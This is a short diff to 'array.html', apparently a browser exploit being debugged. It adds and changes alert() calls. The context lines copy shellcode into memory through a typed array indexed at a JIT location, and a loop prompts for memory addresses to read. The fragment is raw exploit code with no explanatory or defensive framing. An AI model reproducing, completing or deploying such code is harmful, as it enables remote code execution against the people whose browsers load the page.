--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start687");
+alert("start6887");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -178,6 +178,7 @@ for(var i=0;i<shellcode.length;i++){
  myarr[0]=shellcode.charCodeAt(i);
  typedarray[jit_index]+=1;
 }
+ alert(typedarray_index.toString(16))
 while(1){
 a=prompt("addr");
 b="";
